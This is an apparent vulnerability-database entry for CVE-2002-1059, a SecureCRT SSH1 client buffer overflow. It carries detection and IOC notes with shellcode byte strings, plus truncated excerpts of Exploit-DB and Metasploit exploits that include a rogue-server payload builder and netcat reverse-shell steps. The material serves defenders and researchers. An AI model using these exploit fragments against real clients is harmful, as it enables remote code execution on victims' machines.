CVE-2002-1059
published 2002-10-04CVE-2002-1059: Buffer overflow in Van Dyke SecureCRT SSH client before 3.4.6, and 4.x before 4.0 beta 3, allows an SSH server to execute arbitrary code via a long SSH1…
PriorityP347high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
60.30%
99.0th percentile
Buffer overflow in Van Dyke SecureCRT SSH client before 3.4.6, and 4.x before 4.0 beta 3, allows an SSH server to execute arbitrary code via a long SSH1 protocol version string.
Affected
19 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| van_dyke_technologies | securecrt | — | — |
| van_dyke_technologies | securecrt | — | — |
| van_dyke_technologies | securecrt | — | — |
| van_dyke_technologies | securecrt | — | — |
| van_dyke_technologies | securecrt | — | — |
| van_dyke_technologies | securecrt | — | — |
| van_dyke_technologies | securecrt | — | — |
| van_dyke_technologies | securecrt | — | — |
| van_dyke_technologies | securecrt | — | — |
| van_dyke_technologies | securecrt | — | — |
| van_dyke_technologies | securecrt | — | — |
| van_dyke_technologies | securecrt | — | — |
| van_dyke_technologies | securecrt | — | — |
| van_dyke_technologies | securecrt | — | — |
| van_dyke_technologies | securecrt | — | — |
| van_dyke_technologies | securecrt | — | — |
| van_dyke_technologies | securecrt | — | — |
| van_dyke_technologies | securecrt | — | — |
| van_dyke_technologies | securecrt | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xb8\x00\x03\xff\xe0
bytes↗
\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90
- →Detect oversized SSH1 protocol identifier strings (>~250 bytes) sent by a server to a client — the malicious payload begins with 'SSH-1.1-' followed by a long padding of repeated characters or shellcode. ↗
- →Flag SSH1 server banner responses exceeding normal length (>50 bytes) on port 22 or 9988 directed at SecureCRT clients; the Metasploit module sends 243 bytes of random English text after the banner prefix. ↗
- →Monitor for rogue SSH servers listening on non-standard port 9988 (used by both PoC exploits) that send SSH-1.x banner strings to connecting clients. ↗
- →The exploit targets SecureCRT.exe version 3.4.4 with a hardcoded return address 0x0041b3e0; presence of this RET value in network traffic (little-endian: \xe0\xb3\x41\x00) within an SSH1 banner is a strong indicator of exploitation. ↗
- →The EXITFUNC is set to 'process', meaning shellcode execution terminates the process; look for SecureCRT.exe crashing or spawning unexpected child processes after an SSH1 connection attempt. ↗
- ·The Metasploit module only has a single target (SecureCRT 3.4.4) with one hardcoded return address; other vulnerable versions (up to 4.0 Beta 2) are not covered and would require different RET values. ↗
- ·The payload space is limited to 400 bytes with null bytes as bad characters; shellcode must avoid \x00. ↗
- ·A stack adjustment of -3500 is required for the payload to execute correctly, which is an unusual and large negative adjustment that may affect reliability on different stack layouts. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
SecureCRT 4.0 Beta 2 SSH1 - Remote Buffer Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2002-1059 SecureCRT 4.0 Beta 2 SSH1 - Remote Buffer Overflow (Metasploit)
SecureCRT 4.0 Beta 2 SSH1 - Remote Buffer Overflow (Metasploit)
---
##
# $Id: securecrt_ssh1.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 'SecureCRT %q{
This module exploits a buffer overflow in SecureCRT 'MC',
'License' => MSF_LICENSE,
'Version' => '$Revision: 9179 $',
'References' =>
[
[ 'CVE', '2002-1059' ],
[ 'OSVDB', '4991' ],
[ 'BID', '5287' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 400,
'BadChars' => "\x00",
'MaxNops' => 0,
'StackAdjustment' => -3500,
},
'Platform' => 'win',
Exploit-DB
SecureCRT 2.4/3.x/4.0 - SSH1 Identifier String Buffer Overflow (1)
exploitdb·2002-07-23
CVE-2002-1059 SecureCRT 2.4/3.x/4.0 - SSH1 Identifier String Buffer Overflow (1)
SecureCRT 2.4/3.x/4.0 - SSH1 Identifier String Buffer Overflow (1)
---
// source: https://www.securityfocus.com/bid/5287/info
The SecureCRT client is prone to a buffer-overflow condition when attempting to handle an overly long SSH1 protocol identifier string. Reportedly, an attacker can exploit this issue via a malicious server.
Exploiting this issue may allow an attacker to execute arbitrary code or may cause the client to crash.
#include
#include
#include
#include
#define PORT 9988
int main(int argc, char **argv) {
int s, n, i, sz = sizeof(struct sockaddr_in);
struct sockaddr_in local, whatever;
char payload[510];
strcpy(payload, "SSH-1.1-");
for (i = 8; i < 508; i++)
payload[i] = 'A';
payload[508] = '\n';
payload[509] = '\0';
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
Exploit-DB
SecureCRT 2.4/3.x/4.0 - SSH1 Identifier String Buffer Overflow (2)
exploitdb·2002-07-23
CVE-2002-1059 SecureCRT 2.4/3.x/4.0 - SSH1 Identifier String Buffer Overflow (2)
SecureCRT 2.4/3.x/4.0 - SSH1 Identifier String Buffer Overflow (2)
---
// source: https://www.securityfocus.com/bid/5287/info
The SecureCRT client is prone to a buffer-overflow condition when attempting to handle an overly long SSH1 protocol identifier string. Reportedly, an attacker can exploit this issue via a malicious server.
Exploiting this issue may allow an attacker to execute arbitrary code or may cause the client to crash.
// The bug was discovered by Kyuzo
// The schell code exploit was coded by Andrea Lisci
// The program working in the following way
//
// run the exploit
//./shellcode
// run the netcat
// nc -l -p
// connect from secureCRT to the port 9988 using ssh version 1
//
// the remote shell will be opened at netcat computer
#include
#include
#include
#include
#d
Metasploit
SecureCRT SSH1 Buffer Overflow
metasploit
SecureCRT SSH1 Buffer Overflow
SecureCRT SSH1 Buffer Overflow
This module exploits a buffer overflow in SecureCRT <= 4.0 Beta 2. By sending a vulnerable client an overly long SSH1 protocol identifier string, it is possible to execute arbitrary code. This module has only been tested on SecureCRT 3.4.4.
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=102744150718462&w=2http://marc.info/?l=bugtraq&m=102746007908689&w=2http://www.iss.net/security_center/static/9650.phphttp://www.osvdb.org/4991http://www.securityfocus.com/bid/5287http://www.vandyke.com/products/securecrt/security07-25-02.htmlhttp://marc.info/?l=bugtraq&m=102744150718462&w=2http://marc.info/?l=bugtraq&m=102746007908689&w=2http://www.iss.net/security_center/static/9650.phphttp://www.osvdb.org/4991http://www.securityfocus.com/bid/5287http://www.vandyke.com/products/securecrt/security07-25-02.html
2002-10-04
Published